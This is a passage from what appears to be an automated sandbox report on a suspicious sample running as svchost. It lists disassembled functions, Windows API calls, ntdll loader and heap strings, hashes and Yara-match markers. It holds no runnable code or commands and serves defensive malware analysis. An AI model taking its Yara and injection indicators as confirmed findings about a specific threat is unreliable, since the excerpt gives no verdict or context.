                                            • Instruction Fuzzy Hash: 5E01D671E4421876DB21AA919C02FDF7B7C9F81B14F04405AFA047B2C1E6BCAB0287E9
                                            Function 004178AD Relevance: 1.6, APIs: 1, Instructions: 63libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 77 4178ad-4178bf 79 4178c2-4178e7 77->79 80 41792d-417938 77->80 82 4178e9-4178ea 79->82 83 41792b-41792c 79->83 84 417966 80->84 85 41793a-417955 80->85 86 417893-417897 LdrLoadDll 82->86 87 4178ec-4178ed 82->87 83->80 90 41789a-41789d 86->90 88 417919-417928 87->88 89 4178ef-4178f5 87->89 88->83
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417895
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: d0cbdb670fab6d3301bf15a46281e6a2c82c08b571a1915cf0c0d902da7df8fb
                                            • Instruction ID: 2dd5782ad093d96dc561dcacf78cb60062eea1719b4adc808b93db823ea8190a
                                            • Opcode Fuzzy Hash: d0cbdb670fab6d3301bf15a46281e6a2c82c08b571a1915cf0c0d902da7df8fb
                                            • Instruction Fuzzy Hash: 9011CC7700D6555BD712E7B998806EABFB1FFC2B10F50029BC8C1AB662C72298C9CA45
                                            Function 0042B663 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 107 42b663-42b6a7 call 404c33 call 42c3f3 RtlAllocateHeap
                                            APIs
                                            • RtlAllocateHeap.NTDLL(?,0041E04B,?,?,00000000,?,0041E04B,?,?,?), ref: 0042B6A2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 09ca4b5f2ac78ed153d5c2e34071047771ad2360fb15b0f78534533631a75092
                                            • Instruction ID: f839fca352d4b044eca21eec814063bf9772c249c80cc641cdbfbaed8491f16f
                                            • Opcode Fuzzy Hash: 09ca4b5f2ac78ed153d5c2e34071047771ad2360fb15b0f78534533631a75092
                                            • Instruction Fuzzy Hash: 7DE06DB22042087BD610EE59EC41E9B37ACEFC9714F008419FE48A7241D674B91087B9
                                            Function 0042B6B3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 112 42b6b3-42b6f7 call 404c33 call 42c3f3 RtlFreeHeap
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,E283010E,00000007,00000000,00000004,00000000,0041710C,000000F4,?,?,?,?,?), ref: 0042B6F2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 301f91a0926ea47cd6ac96144deb57becc561bcbbb4fd9ca55dd87dbd17baae1
                                            • Instruction ID: 35ba339f6ff0a5bac5ade0ad686a51c56e55e07c44c098c8af39b5c44efa33fe
                                            • Opcode Fuzzy Hash: 301f91a0926ea47cd6ac96144deb57becc561bcbbb4fd9ca55dd87dbd17baae1
                                            • Instruction Fuzzy Hash: 28E06DB22043447BD614EE59EC42F9B77ACEFC5710F004419FD08A7241C7B4B91086B9
                                            Function 0042B703 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 122 42b703-42b73c call 404c33 call 42c3f3 ExitProcess
                                            APIs
                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,EF4AD745,?,?,EF4AD745), ref: 0042B737
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: ed583725cdc7954a57562673015aab054e6f0475a572cb6889a77e7b51b69b1c
                                            • Instruction ID: aa68b55c2dd520546b28a9aa51380d5445a972da3328597556feded3700d28aa
                                            • Opcode Fuzzy Hash: ed583725cdc7954a57562673015aab054e6f0475a572cb6889a77e7b51b69b1c
                                            • Instruction Fuzzy Hash: F5E04F712042147BD520EA5ADC41FDB775CDFC5724F40841AFA08A7141C679B90187E4
                                            Function 03A72C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 127 3a72c0a-3a72c0f 128 3a72c11-3a72c18 127->128 129 3a72c1f-3a72c26 LdrInitializeThunk 127->129
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 52fc328b12e02d0848c86f9ef43994524745637387dbef4d8dbd7cdaff7024fe
                                            • Instruction ID: 6f5e2efa675efa3c8a7ba8ee2e8f84cee8cd93609338ab83b39bb35e1f488e02
                                            • Opcode Fuzzy Hash: 52fc328b12e02d0848c86f9ef43994524745637387dbef4d8dbd7cdaff7024fe
                                            • Instruction Fuzzy Hash: 6AB09B719015C5C5DA11F7604A4C717790967D0701F5AC477D3030645E473DC5D1E175

                                            Non-executed Functions

                                            Function 03AB2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2160512332
                                            • Opcode ID: e0297197d5d3159490b7059e4d16ba47fe15b0b164a897bb4555a7dff4a69f31
                                            • Instruction ID: 3085a0817375a896473837cc336847bf042aed95b42707ce3926013e328532a8
                                            • Opcode Fuzzy Hash: e0297197d5d3159490b7059e4d16ba47fe15b0b164a897bb4555a7dff4a69f31
                                            • Instruction Fuzzy Hash: 5D926B75604341ABD720DF24C984BAAB7FCBB84754F084D2FFA949B292D774E844CB92
                                            Function 03A268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-3089669407
                                            • Opcode ID: 9006e9db255b38701ac9f4f8dbe055bafcd4fdb90fe68eb63229728c6787e922
                                            • Instruction ID: 4cdf410707c7df4adb26691de4961464925a392cee14cac0e036656063747780
                                            • Opcode Fuzzy Hash: 9006e9db255b38701ac9f4f8dbe055bafcd4fdb90fe68eb63229728c6787e922
                                            • Instruction Fuzzy Hash: D48105B2D022187F9B21FB98EED4DEEB7BDAB19654B044527B910F7514D720ED048BA0
                                            Function 03A68620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                            Download Yara Rule
                                            Strings
                                            • undeleted critical section in freed memory, xrefs: 03AA542B
                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA54CE
                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA54E2
                                            • Invalid debug info address of this critical section, xrefs: 03AA54B6
                                            • Critical section address, xrefs: 03AA5425, 03AA54BC, 03AA5534
                                            • 8, xrefs: 03AA52E3
                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA540A, 03AA5496, 03AA5519
                                            • Critical section debug info address, xrefs: 03AA541F, 03AA552E
                                            • Thread is in a state in which it cannot own a critical section, xrefs: 03AA5543
                                            • corrupted critical section, xrefs: 03AA54C2
                                            • double initialized or corrupted critical section, xrefs: 03AA5508
                                            • Critical section address., xrefs: 03AA5502
                                            • Address of the debug info found in the active list., xrefs: 03AA54AE, 03AA54FA
                                            • Thread identifier, xrefs: 03AA553A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                            • API String ID: 0-2368682639
                                            • Opcode ID: 4e2e2701dfcdec1fe0fc97b220e635e1904667e824efdd1385135cf6e0371e57
                                            • Instruction ID: 9880351710fdf7893f13d613f82f7bd5fea31d2acf8dd7b7dfcf0e71f185574a
                                            • Opcode Fuzzy Hash: 4e2e2701dfcdec1fe0fc97b220e635e1904667e824efdd1385135cf6e0371e57
                                            • Instruction Fuzzy Hash: A581BCB5E00758BFDB20CF98C940BAEBBB9FB49704F14415AF518BB241D379A940CB64
                                            Function 03A60F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                            • API String ID: 0-360209818
                                            • Opcode ID: 2a55848a644e8b1765eb0b3a81bd29310f327a5948d1084e19f9ea191c34dee5
                                            • Instruction ID: 552dca624339f647f9c008a499f4cbc42bbf98bde4bc394d710aa196421673fe
                                            • Opcode Fuzzy Hash: 2a55848a644e8b1765eb0b3a81bd29310f327a5948d1084e19f9ea191c34dee5
                                            • Instruction Fuzzy Hash: 77629EB6E006299FDB24CF18C8407A9B7B6EF95320F5982DFD449AB280D7365AD1CF50
                                            Function 03AE12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                            • API String ID: 0-3591852110
                                            • Opcode ID: cdabc38ef213a8776de989863a82d1bde7423cd39bd6c025b790f3bec706a113
                                            • Instruction ID: 354955615d5b02836554ef9c6867f6872e4ee4c1aa768de67680e1769748330e
                                            • Opcode Fuzzy Hash: cdabc38ef213a8776de989863a82d1bde7423cd39bd6c025b790f3bec706a113
                                            • Instruction Fuzzy Hash: 6712AC74604662EFD725DF29C441BBABBF5FF0A714F08845EE4968B681D738E880CB60
                                            Function 03A4AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                            • API String ID: 0-3197712848
                                            • Opcode ID: 7903272d9e1cb083e713d48c61b3ac8ce3721c53a6b371d37859f9866eee9f24
                                            • Instruction ID: 2c5fe55d5829b2facc561aa9e9db98a35adbad48e25e97794b1df0aeab541349
                                            • Opcode Fuzzy Hash: 7903272d9e1cb083e713d48c61b3ac8ce3721c53a6b371d37859f9866eee9f24
                                            • Instruction Fuzzy Hash: 6F12F271A083419FD724DF28C540BAAB7E8BFC5708F084A5FF8999B291E774D944CB62
                                            Function 03A2D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                            • API String ID: 0-3532704233
                                            • Opcode ID: 855b1fd951376812160fa4afca1e500877ed3f72948186df39c822ea1cae5d8a
                                            • Instruction ID: 727d4895858d08c81bd493feaf36f0f3778aa07cf581a5b26443c63f147fa37d
                                            • Opcode Fuzzy Hash: 855b1fd951376812160fa4afca1e500877ed3f72948186df39c822ea1cae5d8a
                                            • Instruction Fuzzy Hash: E7B1AD729083619FC711EF28C980B6BBBE8BB88754F05492FF899DB341D774D9448B92
                                            Function 03AE0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                            • API String ID: 0-1357697941
                                            • Opcode ID: 3c979374273fbcd393c890077c69f19fd506eab7810244c285ca6598d2182311
                                            • Instruction ID: eb56436a0fbab5d3218fa807db58635396c5740f78a8e0eddcfe9a1b254c8353
                                            • Opcode Fuzzy Hash: 3c979374273fbcd393c890077c69f19fd506eab7810244c285ca6598d2182311
                                            • Instruction Fuzzy Hash: C8F10235A04695EFCB25DF6AC480BAAFBF5FF09704F08805FE4969B282C774A945CB50
                                            Function 03AC9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                            • API String ID: 0-3063724069
                                            • Opcode ID: 1652e4432f2c0496356dadf8ffb7b026805bff45b8f574c6c23ca6c1a6cad84f
                                            • Instruction ID: 01e6c9f6e19bbd619502a61e8576617ae89d1b05af0218fea09a585f921164e4
                                            • Opcode Fuzzy Hash: 1652e4432f2c0496356dadf8ffb7b026805bff45b8f574c6c23ca6c1a6cad84f
                                            • Instruction Fuzzy Hash: 89D1D572814395AFD721DB64C980BAFB7ECAF84714F04492FFA949B290E774C948C792
                                            Function 03AE0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 0-1700792311
                                            • Opcode ID: 83c3be018435cb1eab360c79bcaf07fc1a8cc66b953b8cf48365224eb40140fc
                                            • Instruction ID: 9e6f718e18ef580b00d92a16e974ea74100a23be4c80770890ca8b7f1d77a26f
                                            • Opcode Fuzzy Hash: 83c3be018435cb1eab360c79bcaf07fc1a8cc66b953b8cf48365224eb40140fc
                                            • Instruction Fuzzy Hash: 1ED1CC35500685EFCB26EF6AC540AAEFBF1FF5A704F08814AE4559B762C7B89941CB20
                                            Function 03A2D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                            Download Yara Rule
                                            Strings
                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03A2D262
                                            • @, xrefs: 03A2D2AF
                                            • @, xrefs: 03A2D0FD
                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03A2D146
                                            • @, xrefs: 03A2D313
                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03A2D0CF
                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 03A2D196
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03A2D2C3
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                            • API String ID: 0-1356375266
                                            • Opcode ID: a53b2ce46afe2029fd3e0496936f941aec567b482aeede95d32d6e795c25d485
                                            • Instruction ID: af6a3e45794e8b79c273eaf285537dba7fd3ca2d260ec09f6c71290b060196fe
                                            • Opcode Fuzzy Hash: a53b2ce46afe2029fd3e0496936f941aec567b482aeede95d32d6e795c25d485
                                            • Instruction Fuzzy Hash: 46A16A719083559FD721DF28C984B5BBBE8BB84715F004D2FF9A89A241E774D908CF92
                                            Function 03A49EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                            Download Yara Rule
                                            Strings
                                            • @, xrefs: 03A49EE7
                                            • sxsisol_SearchActCtxForDllName, xrefs: 03A976DD
                                            • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03A97709
                                            • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 03A976EE
                                            • Internal error check failed, xrefs: 03A97718, 03A978A9
                                            • minkernel\ntdll\sxsisol.cpp, xrefs: 03A97713, 03A978A4
                                            • Status != STATUS_NOT_FOUND, xrefs: 03A9789A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                            • API String ID: 0-761764676
                                            • Opcode ID: c29e3fabf5cd050da0e0e49ba120c2a177e52bc2fe0181c03362212982bcfc9d
                                            • Instruction ID: 8bb8fa584887a8244383dd2dc6b3bf1e58374753a0c2d42032729b1f74172e33
                                            • Opcode Fuzzy Hash: c29e3fabf5cd050da0e0e49ba120c2a177e52bc2fe0181c03362212982bcfc9d
                                            • Instruction Fuzzy Hash: BC127E74A002259FEF24CF58C881AAEB7F4FF89714F1884ABE845EB351E7359851CB64
                                            Function 03A3EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                            • API String ID: 0-1109411897
                                            • Opcode ID: bf434be5520fb9ab46d5021b9a85015def67e22f0c38b560d7709f0e13be9f2b
                                            • Instruction ID: 4f9bc63339380d25002105fc4fc8d784829f6e2765a09016fd8d8e1ed9b2046a
                                            • Opcode Fuzzy Hash: bf434be5520fb9ab46d5021b9a85015def67e22f0c38b560d7709f0e13be9f2b
                                            • Instruction Fuzzy Hash: 6FA22A75E056298FDF64DF19CD88BA9B7B5AF4A304F1442EBE809A7250DB349E81CF40
                                            Function 03A2F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-523794902
                                            • Opcode ID: 16c4044031f5d8853c8f4f70e4662a210e4548c60b4a0dba66b783665b19f433
                                            • Instruction ID: d7b6a3aed338b33dc7b3751e45d7c2ed532e8014a0644a1eecbbd35f2054a1e6
                                            • Opcode Fuzzy Hash: 16c4044031f5d8853c8f4f70e4662a210e4548c60b4a0dba66b783665b19f433
                                            • Instruction Fuzzy Hash: D242CC75608391DFC715EF28C984A2ABBF5FF89604F084A6FE8968B391D734D841CB52
                                            Function 03A3ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                            • API String ID: 0-4098886588
                                            • Opcode ID: cf74fb4dcc7e045557643824e69456ba336b30ba71bfbc8de4ad1d71cf45dec3
                                            • Instruction ID: 42a0e699015464ab06b8260121f379c540bda2dfad14169db5dd8275e8af3a19
                                            • Opcode Fuzzy Hash: cf74fb4dcc7e045557643824e69456ba336b30ba71bfbc8de4ad1d71cf45dec3
                                            • Instruction Fuzzy Hash: D032B175E04269CFEF25CB14C894BEEB7BAAF46340F1841EBE449A7290D7719E818F50
                                            Function 03A4B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                            • API String ID: 0-122214566
                                            • Opcode ID: 7c0c5fecb97aff0ff6f48800748cf3a0e728a147769c3cceb80d62d223ef7d2e
                                            • Instruction ID: 7495ef8efd58544266c5bc43d8eb5401155a8a98af24a1ddc3ce7af080772324
                                            • Opcode Fuzzy Hash: 7c0c5fecb97aff0ff6f48800748cf3a0e728a147769c3cceb80d62d223ef7d2e
                                            • Instruction Fuzzy Hash: F6C12B35A00215ABDF24CB69C880BBEB7B9AFD5310F18416FE845AF791E7B4D944C3A1
                                            Function 03A663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-792281065
                                            • Opcode ID: 734dff4960eda31b954d31bdc0b14f960f73679e7c349e9349c32ff42e6814ff
                                            • Instruction ID: 85e0079dcac2be84fcc564ce788137faf3e53201d336056493d273d4c4c2c2fd
                                            • Opcode Fuzzy Hash: 734dff4960eda31b954d31bdc0b14f960f73679e7c349e9349c32ff42e6814ff
                                            • Instruction Fuzzy Hash: C6915836A00B149FDB34EF19DA48BAEB7B4FB55B18F08066FE8146B791D7B49801C790
                                            Function 03A6C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 03AA8181, 03AA81F5
                                            • minkernel\ntdll\ldrinit.c, xrefs: 03A6C6C3
                                            • LdrpInitializeImportRedirection, xrefs: 03AA8177, 03AA81EB
                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 03AA81E5
                                            • Loading import redirection DLL: '%wZ', xrefs: 03AA8170
                                            • LdrpInitializeProcess, xrefs: 03A6C6C4
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
